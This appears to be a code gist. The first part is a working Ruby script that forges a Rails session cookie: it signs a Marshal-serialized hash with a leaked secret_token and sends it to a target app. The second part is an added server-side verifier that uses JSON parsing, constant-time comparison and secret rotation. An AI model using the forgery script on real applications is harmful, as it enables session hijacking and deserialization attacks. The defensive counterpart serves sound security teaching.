Created
July 22, 2013 08:22
require "net/http"
require "uri"
require "base64"   # Base64.encode64
require "cgi"      # CGI.escape
require "openssl"  # OpenSSL::HMAC

secret_token = "stolen-from-github-or-somewhere"

# Construct your evil hash
my_evil_session_hash = {
  "ive_made_a_huge_mistake" => true
}

# Serialize your hash
marshal_dump = Marshal.dump(my_evil_session_hash)

# Base64 encode this dump
unescaped_cookie_value = Base64.encode64(marshal_dump)

# Escape any troublesome characters and remove line breaks altogether
escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "")

# Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs.
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "="))

# Construct your evil cookie by concatenating the value with the signature
my_evil_cookie = "_MyApp_session=#{unescaped_cookie_value}--#{cookie_signature}"

# BOMBS AWAY
url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path
req = Net::HTTP::Get.new(url.path)
req.add_field("Cookie", my_evil_cookie)
res = Net::HTTP.new(url.host, url.port).start do |http|
  http.request(req)
end
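The server-side counterpart, as an added example that is not part of the original gist: a verifier for the same `payload--HMAC-SHA1` cookie layout that rejects cookies signed with a rotated-out secret and parses the payload as JSON rather than with `Marshal.load`. All names here (`CURRENT_SECRET`, `sign`, `secure_compare`, `issue_session_cookie`, `verify_session_cookie`) and the secret value are hypothetical.

```ruby
require "openssl"
require "base64"
require "json"

# Constructed placeholder. Load the real secret from the environment or a
# secrets store, never from the repository, and rotate it if it ever leaks.
CURRENT_SECRET = "constructed-secret-after-rotation"

def sign(payload_b64, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), secret, payload_b64)
end

# Constant-time comparison so the check does not leak how many bytes matched.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

def issue_session_cookie(session_hash, secret = CURRENT_SECRET)
  payload_b64 = Base64.strict_encode64(JSON.generate(session_hash))
  "#{payload_b64}--#{sign(payload_b64, secret)}"
end

# Returns the session hash, or nil when the cookie must be rejected.
def verify_session_cookie(cookie_value, secret = CURRENT_SECRET)
  payload_b64, signature = cookie_value.to_s.split("--", 2)
  return nil if payload_b64.nil? || signature.nil?
  return nil unless secure_compare(signature, sign(payload_b64, secret))

  # JSON, not Marshal.load: even a correctly signed payload can only yield
  # hashes, arrays, strings, numbers, booleans and nil.
  data = JSON.parse(Base64.strict_decode64(payload_b64))
  data.is_a?(Hash) ? data : nil
rescue ArgumentError, JSON::ParserError, EncodingError
  nil
end
```

The signature only proves knowledge of the secret, so once the secret is exposed the remaining controls are rotation (old signatures stop verifying) and a payload format that cannot instantiate arbitrary objects.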